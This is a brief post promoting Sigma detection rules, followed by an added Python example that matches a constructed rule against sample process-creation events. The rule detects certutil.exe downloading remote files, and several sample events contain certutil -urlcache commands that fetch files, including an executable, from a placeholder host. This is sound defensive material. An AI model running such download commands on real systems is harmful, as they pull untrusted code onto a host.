Leveraging Sigma Rules for Highlighting Activities of Interest


7 votes


Sigma is a SIEM-neutral format for signatures. The project even provides a library to help process the rules and transform them into the other formats needed for alerting. The rules process different types of logs (EVTX but others too) and can highlight malicious or suspicious activities. Each rule has a description, a list of documented, previously encountered false-positive cases, links to the publications that led to the creation of the rule, and splits the conditions for alerting and exclusion explicitly. So far more than 1900 rules have been written, and more keep being added weekly. The rules are freely available at https://github.com/SigmaHQ/sigma/rules/ – David (elhoim)

Idea Category: New Ideas
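To make the post's description concrete (a rule with a description, references, false positives, and explicitly separated alerting and exclusion conditions), here is an added example that is not part of the original post or of the SigmaHQ project. It reimplements just enough of Sigma's matching semantics in plain Python (field modifiers such as `|contains`, `|endswith` and `|all`, OR-lists of values, and the `condition` expression with `and`/`or`/`not`/parentheses) to run one rule over a few process-creation events. The rule, its field names, the `patchtool.exe` filter and all events are constructed for illustration; in practice you would convert real rules from the repository with `sigma-cli`/`pySigma` into your SIEM's query language rather than matching them yourself.

```python
"""Minimal Sigma-style rule matcher run over constructed process-creation events.

Added example, not SigmaHQ code. It mirrors the rule layout the post describes:
a selection block (what to alert on), a filter block (documented exclusions),
and a condition that combines them. Aggregations and "1 of"/"all of" quantifiers
are deliberately not supported here.
"""
import re

# Constructed rule mirroring the Sigma YAML layout as a plain dict (no PyYAML needed).
RULE = {
    "title": "Certutil Download From URL (constructed example)",
    "description": "Detects certutil.exe used with -urlcache to fetch a remote file.",
    "references": ["https://github.com/SigmaHQ/sigma"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],  # every value must match
        },
        "filter_admin_tool": {  # hypothetical documented false positive, excluded below
            "ParentImage|endswith": "\\patchtool.exe",
        },
        "condition": "selection and not filter_admin_tool",
    },
    "falsepositives": ["Administrators fetching CRLs with certutil"],
    "level": "high",
}

# Constructed Sysmon-like events (not real telemetry). Values are case-insensitive, as in Sigma.
EVENTS = [
    {"RecordId": 1, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://192.0.2.10/a.txt a.txt",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                    # alerts
    {"RecordId": 2, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://192.0.2.10/p.cab p.cab",
     "ParentImage": "C:\\Tools\\patchtool.exe"},                           # excluded by filter
    {"RecordId": 3, "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -verify cert.cer",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                    # no urlcache/http
    {"RecordId": 4, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process",
     "ParentImage": "C:\\Windows\\explorer.exe"},                          # wrong image
    {"RecordId": 5, "Image": "C:\\WINDOWS\\SYSTEM32\\CERTUTIL.EXE",
     "CommandLine": "CERTUTIL -URLCache -f HTTP://192.0.2.10/x.exe x.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                    # alerts despite case
]


def _match_value(modifiers, value, pattern):
    """Apply one field modifier (contains/startswith/endswith/re, default equals)."""
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    if "re" in modifiers:
        return re.search(str(pattern), str(value)) is not None
    return v == p


def _match_map(selection, event):
    """All fields of a map must match; a list of values is OR unless '|all' is present."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        patterns = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(modifiers, event[field], p) for p in patterns]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


def _match_search(search, event):
    """A search identifier is a map, a list of maps (OR), or a keyword list (substring anywhere)."""
    if isinstance(search, list):
        if all(isinstance(s, str) for s in search):
            blob = " ".join(str(v) for v in event.values()).lower()
            return any(s.lower() in blob for s in search)
        return any(_match_map(m, event) for m in search)
    return _match_map(search, event)


def eval_condition(condition, results):
    """Evaluate 'a and (b or not c)'-style conditions; precedence not > and > or."""
    tokens = re.findall(r"\(|\)|[A-Za-z_]\w*", condition)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def factor():
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            value = expr()
            take()  # closing parenthesis
            return value
        if tok not in results:
            raise ValueError(f"unsupported or unknown search identifier: {tok}")
        return results[tok]

    def term():
        value = factor()
        while peek() == "and":
            take()
            value = factor() and value  # right side parsed first so parsing never short-circuits
        return value

    def expr():
        value = term()
        while peek() == "or":
            take()
            value = term() or value
        return value

    return expr()


def matches(rule, event):
    """True if the event satisfies the rule's condition over its search identifiers."""
    detection = rule["detection"]
    results = {name: _match_search(search, event)
               for name, search in detection.items() if name != "condition"}
    return eval_condition(detection["condition"], results)


def matching_records(rule, events):
    """Return the RecordIds that would raise an alert for this rule."""
    return [e["RecordId"] for e in events if matches(rule, e)]


if __name__ == "__main__":
    print(RULE["title"], "->", matching_records(RULE, EVENTS))
```

Record 2 shows why the post's point about explicit exclusions matters: the same command line would alert, but the documented false-positive parent is carved out in a separate filter block rather than by weakening the selection, so the exclusion stays reviewable on its own.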